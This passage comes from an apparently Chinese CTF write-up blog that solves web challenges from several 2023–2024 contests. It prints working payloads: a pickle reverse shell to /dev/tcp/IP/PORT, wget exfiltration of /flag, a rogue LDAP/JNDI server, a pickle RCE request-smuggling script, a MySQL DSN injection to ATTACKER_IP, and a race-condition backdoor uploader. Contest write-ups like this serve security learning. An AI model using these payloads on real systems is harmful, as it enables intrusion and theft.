<\/a>\u00a0<\/p>\n\n- web >> NinjaClub<\/strong><\/span><\/li>\n<\/ul>\n
\u534a\u5c0f\u65f6\u89e3\u51b3\u3002Jinja2 \u7684 SandboxEnvironment \u57fa\u672c\u4e0a\u6ca1\u6cd5\u9003\u9038\uff0c\u628a\u4e0b\u5212\u7ebf\uff0c\u5185\u7f6e\u7c7b\u578b\u68c0\u6d4b\u4e86\u4e2a\u904d\u3002\u90a3\u4e48\u95ee\u9898\u5c31\u5728\u4e8e\u4f20\u8fdb\u53bb\u7684\u53c2\u6570\uff0cpydantic \u6e90\u4ee3\u7801\u987a\u7740\u5f80\u91cc\u8fb9\u7ffb\u4e00\u7ffb\uff0c\u9a6c\u4e0a\u5c31\u80fd\u53d1\u73b0\uff1a<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/nc-code-pydantic.png\")
<\/p>\n
\u8fd9\u4e2a allow_pickle \u53c2\u6570\u53ef\u7591\u5f97\u4e0d\u80fd\u518d\u53ef\u7591\u4e86\u597d\u5427\u3002\u7ee7\u7eed\u8ddf\u8fdb\uff0c\u76f4\u63a5 pickle.load() \u4e86\u5c31\uff0ccontent_type \u4e5f\u662f\u53ef\u63a7\u7684\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/nc-code-pydantic-parse.png\")
<\/p>\n
PoC \u6ca1\u4ec0\u4e48\u597d\u8bf4\uff0c\u4e00\u6b65\u5230\u4f4d\u3002<\/p>\n
{{user.parse_raw('c__builtin__\\neval\\np0\\n(V__import__(\"os\").system(\"\/bin\/bash -c \\'bash -i >& \/dev\/tcp\/IP\/PORT 0>&1\\'\")\\np1\\ntp2\\nRp3\\n.',content_type='pickle',allow_pickle=True)}}<\/code><\/p>\n <\/p>\n
\n<\/a>\u00a02024\u5e745\u6708\u00a0 \u4eac\u9e92CTF
\n<\/strong><\/span><\/p>\n\n- \n
web >> ezldap
\n<\/strong><\/span><\/p>\n<\/li>\n<\/ul>\n\u9996\u5148 actuator \u6cc4\u9732\uff0c\u5728 \/actuator\/mappings \u53ef\u4ee5\u770b\u5230\u9690\u85cf\u8def\u7531 \/source_tr15d0\uff0c\u4e3a\u4f7f\u7528 ldap:\/\/ \u8fde\u63a5\u7684 \/lookup \u8def\u7531\u6e90\u4ee3\u7801\u3002\u67e5\u770b env \u53d1\u73b0 com.sun.jndi.ldap.object.trustSerialData=false<\/code>\uff0c\u6ca1\u6709\u529e\u6cd5\u8d70\u53cd\u5e8f\u5217\u5316\uff0c\u800c\u4e14 heapdump \u53ef\u4ee5\u641c\u5230 jdk 17 \u4ee5\u53ca springboot 2.7.18 \u90fd\u975e\u5e38\u7684\u65b0\u3002<\/p>\nhttps:\/\/tttang.com\/archive\/1405\/#toc_tomcat-jdbc<\/a><\/p>\n\u6709 tomcat-jdbc \u4f9d\u8d56\uff0cRMI \u6309\u7167\u4e0a\u9762\u7684 PoC \u6253\u5c31\u5b8c\u4e8b\u4e86\uff0cldap \u7684\u8bdd\uff0c\u6839\u636e\u8c03\u7528\u94fe\u53ef\u4ee5\u770b\u5230 lookup() \u6700\u7ec8\u4e5f\u662f getObjectInstance()\uff0c\u7ee7\u7eed\u8ddf\u8fdb decodeObject() \u770b\u770b\u600e\u4e48\u5904\u7406 ReferenceRef\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/ezldap-code-lookup.png\")
<\/p>\n
\u7ee7\u7eed\u8ddf\u8fdb decodeReference()\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/ezldap-code-decode-object.png\")
<\/p>\n
\u8fd9\u91cc\u53ef\u4ee5\u770b\u89c1 className \u8ddf factory \u90fd\u53ef\u63a7\u4e86\uff0c\u6ce8\u610f\u8fd9\u4e2a RefAddr\uff0c\u7ee7\u7eed\u5f80\u4e0b\u627e\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/ezldap-code-decode-reference.png\")
<\/p>\n
\u6700\u540e\u4e5f\u5c31\u662f\u5f53\u505a StringRefAddr \u53c2\u6570\u52a0\u8fdb\u53bb\u4e86\uff0c\u81f3\u6b64\u8ddf RMI \u8c03\u7528\u94fe\u5b8c\u5168\u4e00\u81f4\uff0c\u6309\u7167\u5b83\u7684\u683c\u5f0f\u8d77\u4e00\u4e2a ldap \u5373\u53ef\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/ezldap-code-reference-strref.png\")
<\/p>\n
\u8fd9\u91cc\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cCREATE TRIGGER \u597d\u50cf\u56e0\u4e3a\u7248\u672c\u7684\u539f\u56e0\u6253\u4e0d\u901a\uff0c\u6362\u6210 RUNSCRIPT FROM \u7ee7\u7eed\u6253\u3002\u8fdc\u7a0b\u73af\u5883\u662f Alpine\uff0c\u6ca1\u6709 bash\uff0c\u7528 wget --post-file \/flag<\/code> \u5e26\u51fa\u6570\u636e\u3002<\/p>\nCREATE ALIAS EXECz AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"\";}';\r\nCALL EXECz ('wget --post-file \/flag http:\/\/IP:PORT\/')<\/pre>\n <\/p>\n
package com.example.demo;\r\nimport com.unboundid.ldap.listener.InMemoryDirectoryServer;\r\nimport com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;\r\nimport com.unboundid.ldap.listener.InMemoryListenerConfig;\r\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\r\nimport com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;\r\nimport com.unboundid.ldap.sdk.Entry;\r\nimport com.unboundid.ldap.sdk.LDAPException;\r\nimport com.unboundid.ldap.sdk.LDAPResult;\r\nimport com.unboundid.ldap.sdk.ResultCode;\r\nimport com.unboundid.util.Base64;\r\n\r\nimport javax.net.ServerSocketFactory;\r\nimport javax.net.SocketFactory;\r\nimport javax.net.ssl.SSLSocketFactory;\r\nimport java.net.InetAddress;\r\nimport java.net.MalformedURLException;\r\nimport java.text.ParseException;\r\n\r\n\r\npublic class ldap_server {\r\n\r\n private static final String LDAP_BASE = \"dc=example,dc=com\";\r\n public static void main (String[] args) {\r\n int port = 1389;\r\n try {\r\n InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);\r\n config.setListenerConfigs(new InMemoryListenerConfig(\r\n \"listen\",\r\n InetAddress.getByName(\"0.0.0.0\"),\r\n port,\r\n ServerSocketFactory.getDefault(),\r\n SocketFactory.getDefault(),\r\n (SSLSocketFactory) SSLSocketFactory.getDefault()));\r\n\r\n config.addInMemoryOperationInterceptor(new OperationInterceptor());\r\n InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);\r\n System.out.println(\"Listening on 0.0.0.0:\" + port);\r\n ds.startListening();\r\n\r\n }\r\n catch ( Exception e ) {\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n private static class OperationInterceptor extends InMemoryOperationInterceptor {\r\n public OperationInterceptor () {\r\n }\r\n\r\n @Override\r\n public void processSearchResult ( InMemoryInterceptedSearchResult result ) {\r\n String base = result.getRequest().getBaseDN();\r\n Entry e = new Entry(base);\r\n try {\r\n sendResult(result, base, e);\r\n }\r\n catch ( Exception e1 ) {\r\n e1.printStackTrace();\r\n }\r\n\r\n }\r\n protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException {\r\n e.addAttribute(\"objectClass\", \"javaNamingReference\"); \/\/$NON-NLS-1$\r\n e.addAttribute(\"javaClassName\", \"javax.sql.DataSource\");\r\n e.addAttribute(\"javaFactory\", \"org.apache.tomcat.jdbc.pool.DataSourceFactory\");\r\n String JDBC_URL = \"jdbc:h2:mem:memdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/REMOTE_IP\/h2.sql'\";\r\n e.addAttribute(\"javaReferenceAddress\", \"#0#driverClassName#org.h2.Driver\");\r\n e.addAttribute(\"javaReferenceAddress\", \"#1#url#\"+JDBC_URL);\r\n e.addAttribute(\"javaReferenceAddress\", \"#2#username#sa\");\r\n \/\/e.addAttribute(\"javaReferenceAddress\", \"#3#password#\");\r\n e.addAttribute(\"javaReferenceAddress\", \"#3#initialSize#1\");\r\n e.addAttribute(\"javaReferenceAddress\", \"#4#init#true\");\r\n result.sendSearchEntry(e);\r\n result.setResult(new LDAPResult(0, ResultCode.SUCCESS));\r\n }\r\n }\r\n}\r\n<\/pre>\n <\/p>\n
\n<\/a>\u00a02024\u5e744\u6708\u00a0 D^3CTF
\n<\/strong><\/span><\/p>\n\n- \n
web >> d3pythonhttp<\/strong><\/span><\/p>\n<\/li>\n<\/ul>\n\u524d\u9762 Flask\uff0c\u540e\u9762 web.py\uff0c\u660e\u663e\u662f\u5229\u7528\u89e3\u6790\u5dee\u5f02\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/d3hp-flask-dechunk.png\")
<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/d3hp-webpy-dechunk.png\")
<\/p>\n
Flask \u8fd9\u91cc\u662f lower()\uff0c\u5e95\u4e0b\u7684 web.py \u76f4\u63a5\u5224\u65ad\uff0c\u6240\u4ee5\u53d6 “Chunked” \u53ef\u4ee5\u4f7f\u524d\u9762\u6b63\u5e38\u89e3\u6790\u800c\u540e\u9762\u4fdd\u7559\u3002<\/p>\n
Fuzz \u4e00\u4e0b\uff0c\u53d1\u73b0 Flask \u5bf9 Content-Length \u4e0d\u654f\u611f\uff0cwsgi \u89e3\u5b8c chunk \u540e web.py \u521a\u597d\u6839\u636e CL \u622a\u65ad\uff0c\u53ef\u4ee5\u628a\u540e\u9762\u7684 Backdoor… \u5b57\u7b26\u4e32\u5220\u53bb\uff0c\u4fdd\u7559\u524d\u8fb9\u5b8c\u6574\u7684 base64 payload\u3002<\/p>\n
\u5bf9\u4e8e jwt \u7684\u90e8\u5206\uff0ckid \u53ef\u4ee5\u76ee\u5f55\u7a7f\u8d8a\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\uff0c\u968f\u4fbf\u9009\u4e00\u4e2a\u5f53 key \u5c31\u53ef\u4ee5\u3002\u4e0b\u56fe\u4e2d\u8fd9\u4e2a\u6587\u4ef6\u8bfb\u51fa\u6765\u662f “Linux”\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/d3hp-kid.png\")
<\/p>\n
\u6700\u540e\u76f4\u63a5 pickle R(CE) \u5373\u53ef\uff0c\u7531\u4e8e\u4e0d\u51fa\u7f51\uff0c\u76f4\u63a5 exec \u66ff\u6362 index.GET \u9ed8\u8ba4\u8def\u7531\u56de\u663e\u3002<\/p>\n
import base64, pickle, socket\r\n\r\nclass R(object):\r\n def __reduce__(self):\r\n return (exec, ('index.GET=(lambda x: __import__(\"os\").popen(\"cat \/Secr3T_Flag\").read());', ))\r\n\r\npayload = base64.b64encode(pickle.dumps(R()))\r\n\r\ndata = f'''POST \/admin HTTP\/1.1\r\nHost: python-backend:8080\r\nCookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uL3Byb2Mvc3lzL2tlcm5lbC9vc3R5cGUifQ.eyJ1c2VybmFtZSI6ImEiLCJpc2FkbWluIjp0cnVlfQ.QNAZtiSeedmA7mnPacjjkjBlf3gb5QXXjEy-9USsYAQ\r\nTransfer-Encoding: Chunked\r\nContent-Length: {len(payload)}\r\n\r\n{hex(len(payload))[2:]}\r\n{payload.decode()}\r\n1c\r\nBackdoorPasswordOnlyForAdmin\r\n0\r\n\r\n'''.encode().replace(b'\\r\\n', b'\\n').replace(b'\\n', b'\\r\\n')\r\n\r\nprint(data.decode())\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('47.116.173.108', 31303))\r\n\r\ns.send(data)\r\nprint(s.recv(4096).decode())\r\nprint(s.recv(4096).decode())<\/pre>\n<\/a>\u00a0<\/p>\n\n- web >> Doctor<\/strong><\/span><\/li>\n<\/ul>\n
\u5148\u5ba1\u8ba1\u8def\u7531\u4ee3\u7801\uff0c\u53ef\u4ee5\u770b\u5230 Recorder \u6743\u9650\u68c0\u6d4b\u4e86\u4e00\u4e2a IsWebsocket() \uff0c\u8ddf\u8fdb\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/doctor-iswebsocket.png\")
<\/p>\n
\u53ef\u4ee5\u53d1\u73b0\uff0c\u53ea\u662f\u5224\u65ad\u4e86\u4e24\u4e2a HTTP \u8bf7\u6c42\u5934\uff0c\u800c websocket \u7684\u4ea4\u4e92\u8fc7\u7a0b\u9700\u8981\u670d\u52a1\u7aef\u8fd4\u56de 101 \u624d\u80fd\u6b63\u5e38\u5efa\u7acb\u3002\u56e0\u6b64\uff0c\u5e26\u8fd9\u4e24\u4e2a\u5934\u8bf7\u6c42 API \u65f6\uff0c\u53ef\u4ee5\u7ed5\u8fc7 Recorder \u9274\u6743\uff0c\u800c\u4e0d\u5f71\u54cd Endpoint \u63a7\u5236\u5668\u5904\u7406\u6d41\u7a0b\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/doctor-code-iswebsocket.png\")
<\/p>\n
\u6709\u4e00\u70b9\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5728\u8fd9\u79cd\u7ed5\u8fc7\u65b9\u6cd5\u4e0b\uff0c\u63a7\u5236\u5668\u4ee3\u7801\u4e5f\u4e0d\u80fd\u5305\u62ec\u4efb\u4f55\u5bf9\u4e8e jwt \u7684\u89e3\u6790\uff0c\u5426\u5219\u4f1a\u62a5\u9519\uff0c\u65e0\u6cd5\u7ee7\u7eed\u3002<\/p>\n
\u4ece\u4f17\u591a\u7684\u8def\u7531\u4e2d\u8c28\u614e\u5730\u9009\u51fa\u4e86\u4e00\u4e2a\uff0cYearningFetchApis -> FetchResourceForGet -> FetchTableInfo -> FetchTableFieldsOrIndexes<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/doctor-code-fetchtable.png\")
<\/p>\n
\u5176\u4e2d model.CoreDataSource \u5728\u9898\u76ee\u73af\u5883\u4e2d\u4e0d\u5b58\u5728\u76f8\u5e94\u8bb0\u5f55\uff0c\u4e5f\u5c31\u662f\u8bf4\u53ea\u6709 u.DataBase \u53ef\u63a7\u3002<\/p>\n
\u51fd\u6570 NewDBSub() \u4f7f\u7528 sql driver \u6253\u5f00\u4e86 DSN \u8fde\u63a5\uff0cInitDSN() \u6700\u7ec8\u4f1a\u8c03\u7528\u5230 FormatDSN() \u5c06 DSN \u7ed3\u6784\u4f53\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\uff0c\u7ee7\u7eed\u8ddf\u8fdb\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/doctor-code-newdb.png\")
<\/p>\n
\u53ef\u4ee5\u53d1\u73b0\uff0c\u8fd9\u91cc\u76f4\u63a5\u5c06\u6211\u4eec\u53ef\u63a7\u7684 DBName \u5199\u5165\u4e86 connection string \u4e2d\uff0c\u800c\u4e14\u6211\u4eec\u7684\u76ee\u6807\uff0cLOCAL INFILE \u7684\u5f00\u542f\u9009\u9879 allowAllFiles \u5c31\u5728\u5e95\u4e0b\u3002\u5982\u679c\u80fd\u591f\u6784\u9020\u5b57\u7b26\u4e32\u6df7\u6dc6 DSN \u7684\u89e3\u6790\uff0c\u4f7f\u5176\u8fde\u63a5\u5230\u6076\u610f MySQL \u670d\u52a1\u5668\uff0c\u518d\u5f00\u542f\u8fd9\u4e2a\u53c2\u6570\uff0c\u5c31\u53ef\u4ee5\u76f4\u63a5\u8bfb \/flag \u4e86\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/doctor-code-formatdsn.png\")
<\/p>\n
\u518d\u770b\u89e3\u6790\u6d41\u7a0b\uff0c\u53ef\u4ee5\u53d1\u73b0\u5b83\u662f\u4ece\u540e\u5f80\u524d\u5339\u914d\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u53ef\u4ee5\u5728 dbname \u540e\u63d2\u5165 ‘\/’ \u4ee5\u8986\u76d6\u53c2\u6570\uff0c\u540c\u6837\u63d2\u5165 ‘@’ \u8986\u76d6 net(addr)\uff0c\u7528\u6237\u540d\u4e0d\u53ef\u63a7\uff0c\u4f46\u662f\u8fd9\u4e0d\u91cd\u8981\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/doctor-code-parsedsn.png\")
<\/p>\n
\u81f3\u6b64\uff0c\u653b\u51fb\u94fe\u5df2\u7ecf\u6784\u9020\u5b8c\u6210\uff0cpoc \u975e\u5e38\u7b80\u5355\uff1a<\/p>\n
curl -vv -H \"Connection: upgrade\" -H \"Upgrade: websocket\" \"http:\/\/106.14.121.29:30167\/api\/v2\/fetch\/fields?data_base=@tcp(ATTACKER_IP:3306)\/db?allowAllFiles=true%26&table=1\"<\/code><\/p>\n![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/doctor-flag.png\")
<\/p>\n
\uff08\u9644\u6ce8\uff1a\u4e00\u76f4\u4e60\u60ef\u5728 github \u4e0a\u7ffb\u6700\u65b0\u7684\u6e90\u4ee3\u7801\uff0c\u9ed8\u8ba4\u5404\u7ec4\u4ef6\u51e0\u4e4e\u90fd\u662f up-to-date \u7684\u3002\u4f46\u662f\u672c Yearning \u5f15\u5165\u7684 go-sql-driver \u7248\u672c\u4e3a 1.7.3\uff0c\u800c\u5982\u4e0b\u7684 issue \u4fee\u590d\u4e86\u8fd9\u4e2a\u95ee\u9898\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/doctor-github-issue.png\")
<\/p>\n
<\/a>\u00a0<\/p>\n\n- web >> moonbox<\/strong><\/span><\/li>\n<\/ul>\n
\u9996\u5148\u5728 Dockerfile \u91cc\u53ef\u4ee5\u53d1\u73b0 root \u5f31\u5bc6\u7801\u4ee5\u53ca SSH \u5f00\u542f\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/moonbox-dockerfile.png\")
<\/p>\n
\u7136\u540e\u7b80\u5355\u5730\u5ba1\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\/api\/console-agent\/fileUpload \u53ef\u4ee5\u4e0a\u4f20 sandbox-agent.tar\uff0c\/api\/record\/run \u53ef\u4ee5\u8fde\u63a5\u5230\u76ee\u6807 SSH \u6267\u884c\u5982\u4e0b\u4ee3\u7801\u7247\u6bb5\uff08RecordRunController.run() -> AbstractTaskRunService.taskRun() -> AgentDistributionServiceImpl.startAgent() -> startServerAgent()<\/code>\uff09\u3002\u7531\u4e8e tar \u5305\u5185\u5bb9\u6211\u4eec\u53ef\u63a7\uff0c\u76f4\u63a5\u8986\u76d6\u5e95\u4e0b\u90a3\u4e2a start-remote-agent.sh \u8fde\u672c\u673a\u5f39 rev shell \u5373\u53ef\u3002<\/p>\n![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/moonbox-code.png\")
<\/p>\n
<\/a>\u00a0<\/p>\n\n- web >> stack_overflow<\/strong><\/span><\/li>\n<\/ul>\n
\u4ee3\u7801\u6570\u636e\u6df7\u6dc6\uff0c\u7b2c\u4e00\u4e2a read \u5728 23 \u884c\uff0c\u800c\u4e00\u4e0b\u5b50\u53ef\u4ee5\u8bfb\u8fdb\u6765 28 \u884c\uff0c\u8986\u76d6\u63a5\u4e0b\u6765\u7684\u6307\u4ee4\u3002\u6b63\u5219\u7684 waf \u8fc7\u6ee4\u4e0d\u5b8c\u5168\uff0c\u4e24\u4e2a {{ }} \u4e4b\u95f4\u53ef\u4ee5\u4f7f\u7528\u6362\u884c\u7b26\u7ed5\u8fc7\uff0c\u4e14\u4e0d\u5f71\u54cd eval() \u6b63\u5e38\u6267\u884c\u3002\u7136\u540e\u968f\u4fbf\u6784\u9020\u56de\u663e\u5373\u53ef\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/d3ctf-stackoverflow.png\")
<\/p>\n
{\"stdin\":[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"23\",\"24\",\"{{respond[0]=process.mainModule.require('child_process').execSync('cat \/flag').toString()\\n}}\",\"result\",\"write\",\"exit\"]}<\/code><\/p>\n <\/p>\n
\n<\/a>\u00a02023\u5e7411\u6708\u00a0 \u5f3a\u7f51\u62df\u6001\u7ebf\u4e0a<\/span>
\n<\/strong><\/p>\n\n- \n
web >> noumisotuitennnoka<\/span>
\n<\/strong><\/p>\n<\/li>\n<\/ul>\n\u6ce8\u610f\u5230\u5148 put_file_contents backdoor.php \u518d .htaccess \uff0c\u5b58\u5728 race condition\uff0c\u5f00\u591a\u4e2a\u7ebf\u7a0b\u7ade\u4e89 create \u8ddf zip\uff0c\u7206\u7387\u5728\u5343\u5206\u4e4b\u4e00\u5de6\u53f3\u3002<\/p>\n
import requests\r\nimport threading\r\nimport random, string, time\r\n\r\nurl = \"http:\/\/URL:PORT\/\"\r\nrequests.get(url)\r\n\r\nbatch = 200\r\nsubdir = ['\/'+''.join(random.choices(string.ascii_lowercase, k=8)) for _ in range(batch)]\r\ndef create(s):\r\n requests.get(url, params={'action': 'clean', 'subdir': s})\r\n def t1():\r\n requests.get(url, params={'action': 'create', 'subdir': s})\r\n print('.', end='', flush=True)\r\n def t2():\r\n requests.get(url, params={'action': 'zip', 'subdir': s})\r\n print('!', end='', flush=True)\r\n threading.Thread(target=t1).start()\r\n threading.Thread(target=t2).start()\r\nfor s in subdir:\r\n threading.Thread(target=create, args=(s,)).start()\r\ntime.sleep(15)\r\nlock = threading.Lock()\r\ndef check(s):\r\n time.sleep(random.random()*10)\r\n requests.get(url, params={'action': 'unzip', 'subdir': s})\r\n res = requests.get(url.rpartition('\/')[0] + '' + s + '\/backdoor.php')\r\n with lock:\r\n if res.status_code in [403, 404]:\r\n print(s, 'fail', res.status_code, flush=True)\r\n else:\r\n print(s, '!!!!', res.text, flush=True)\r\nfor s in subdir:\r\n threading.Thread(target=check, args=(s,)).start()\r\ninput()<\/pre>\n
- \n
- 2024\u5e746\u6708\u00a0 R3CTF<\/strong><\/span>\n
- \n
- web >> r3php<\/a><\/span><\/strong><\/li>\n
- web >> Modern WordPress<\/span><\/strong><\/a><\/li>\n
- web >> JustMongo<\/span><\/strong><\/a><\/li>\n
- web >> NinjaClub<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- \n
- \n
- \n
- 2024\u5e745\u6708\u00a0 \u4eac\u9e92CTF<\/strong><\/span>\n
- \n
- web >> ezldap<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- \n
- \n
- \n
- 2024\u5e744\u6708\u00a0 D^3CTF<\/strong><\/span>\n
- \n
- web >> d3pythonhttp<\/span><\/strong><\/a><\/li>\n
- web >> Doctor<\/span><\/strong><\/a><\/li>\n
- web >> moonbox<\/span><\/strong><\/a><\/li>\n
- web >> stack_overflow<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- \n
- \n
- \n
- 2023\u5e7411\u6708\u00a0 \u5f3a\u7f51\u62df\u6001\u7ebf\u4e0a<\/strong><\/span>\n
- \n
- web >> noumisotuitennnoka<\/span><\/strong><\/a><\/li>\n
- web >> easyjava<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- \n
- \n
- \n
- 2023\u5e7411\u6708\u00a0 HITCTF<\/strong><\/span>\n
- \n
- Reverse & Web<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- \n
- \n
- \n
- 2023\u5e7410\u6708\u00a0 N1CTF<\/strong><\/span>\n
- \n
- web >> ggos<\/span><\/strong><\/a><\/li>\n
- web >> laravel<\/span><\/strong><\/a><\/li>\n
- web >> ezmaria<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
<\/p>\n
\n<\/a>\u00a02024\u5e746\u6708\u00a0 R3CTF<\/span><\/strong><\/p>\n
- \n
- \n
web >> r3php<\/strong><\/span><\/p>\n<\/li>\n<\/ul>\n
\u9996\u5148\u7ed9\u5230\u7684\u662f\u4e00\u4e2a\u65e0\u56de\u663e file_get_contents()\uff0c\u9650\u5b9a http \u534f\u8bae\uff0c\u53ef\u4ee5\u81ea\u5b9a\u4e49\u8bf7\u6c42\u5934\u3002\u6240\u4ee5\u76ee\u6807\u5f88\u660e\u786e\uff0c\u5c31\u662f SSRF \u653b\u51fb phpstudy \u7684\u5185\u7f51\u534f\u8bae\u3002<\/p>\n
php-fpm \u5f00\u7740\uff0c\u4f46\u662f\u8fd9\u91cc\u6ca1\u6cd5\u6253\u30029080 \u7528 Workerman \u5f00\u7740\u540e\u53f0\u9762\u677f\u754c\u9762\uff0c\u9664\u4e86\u767b\u5f55\u63a5\u53e3\u90fd\u6709\u9274\u6743\uff0c\u7ed5\u4e86\u5f88\u5927\u7684\u5f2f\u8def\u4e4b\u540e\u53d1\u73b0\uff0c\u6ca1\u6cd5\u4f7f\u7528\u81ea\u5b9a\u4e49\u7684 session cookie\uff08\u5b58\u7591\uff1f\u5176\u5b9e\u8fd9\u91cc\u9762\u8fd8\u5b58\u5728\u8bfb\u6587\u4ef6\/\u53cd\u5e8f\u5217\u5316\u7684\u903b\u8f91\uff09\uff0c\u6bcf\u6b21 sessionStart() \u90fd\u4f1a\u5237\u65b0\uff0c\u81ea\u7136\u9a8c\u8bc1\u7801\u5c31\u65e0\u6cd5\u7206\u7834\uff0c\u5728 GET \u540e\u9762\u4f2a\u9020 POST \u7684\u65f6\u5019\u4e5f\u8001\u662f\u7206 400\uff0c\u4e0d\u77e5\u9053\u548b\u56de\u4e8b\uff0c\u53ea\u5f97\u653e\u5f03\u3002<\/p>\n
8090 \u7aef\u53e3\u5f00\u7740 phpstudy \u7a0b\u5e8f\uff0c\u524d\u7aef\u754c\u9762\u4f7f\u7528\u81ea\u5b9a\u4e49\u7684\u534f\u8bae\u4e0e\u5176\u901a\u4fe1\uff1a<\/p>\n
<\/p>\n\u53ef\u4ee5\u770b\u5230\u662f\u6bd4\u8f83\u7c97\u7cd9\u7684\uff0cJSON^^^ \u8fd9\u6837\uff0c\u5148\u770b\u770b\u540e\u53f0\u5b9e\u9645\u7684\u767b\u5f55\u903b\u8f91\u5982\u4f55\u5b9e\u73b0\u3002<\/p>\n
<\/p>\n\u5bc6\u7801\u5728\u524d\u9762\u53d6\u4e86 MD5\uff0c\u7528\u6237\u540d\u5565\u8fc7\u6ee4\u6ca1\u6709\uff0c\u4e5f\u5c31\u662f\u8bf4\u5b58\u5728 SQLite \u6ce8\u5165\u3002<\/p>\n
\u521a\u5f00\u59cb\u80af\u5b9a\u4f1a\u60f3\u901a\u8fc7 9080 \u7684\u90a3\u4e2a\u9762\u677f\u6253\uff0c\u6bd5\u7adf\u90fd\u662f HTTP\uff0c\u559c\u95fb\u4e50\u89c1\u7684\u662f\uff0cPHP 5 \u4e0b htmlspecialchars \u4e5f\u6ca1\u8fc7\u6ee4\u5355\u5f15\u53f7\uff0c\u6240\u4ee5\u4e00\u4e2a\u76f4\u89c2\u7684\u60f3\u6cd5\u662f\u76f4\u63a5\u7528\u4e07\u80fd\u5bc6\u7801\u6253\u8fdb\u53bb\u3002<\/p>\n
<\/p>\n\u7136\u540e\u5c31\u4f1a\u9047\u5230\u4e24\u4e2a\u95ee\u9898\uff0c\u4e00\u662f\u6ca1\u6709\u56de\u663e\uff0c\u6ca1\u6709\u9a8c\u8bc1\u7801\u7684 session\uff0c\u65e0\u4ece\u767b\u5f55\uff0c\u4e8c\u662f\u5b9e\u9645\u8bd5\u8fc7\u4e07\u80fd\u5bc6\u7801\u4e4b\u540e\uff0c\u53d1\u73b0\u90a3\u4e2a\u7a0b\u5e8f\u5b83 crash \u4e86\uff0c\u6ca1\u9519\uff0csegmentation falt\uff0c\u4e0d\u77e5\u9053\u662f\u540e\u8fb9\u63d2\u767b\u5f55\u65e5\u5fd7\u7684\u65f6\u5019\u62a5\u9519\uff0c\u76f4\u63a5\u7a7a\u6307\u9488\u5f15\u7528\u4e86\u8fd8\u662f\u5565\uff0c\u603b\u4e4b\u4e00\u53e5\u8bdd\u5c31\u662f\uff0c\u5373\u4f7f\u89e3\u51b3\u4e86 session \u7684\u95ee\u9898\uff0c\u5728\u524d\u7aef 16 \u4e2a\u5b57\u7b26\uff0c\u7ecf\u8fc7 htmlspecialchars\uff0c\u8981\u6784\u9020\u51fa\u540c\u65f6\u7b26\u5408 SELECT \u548c INSERT 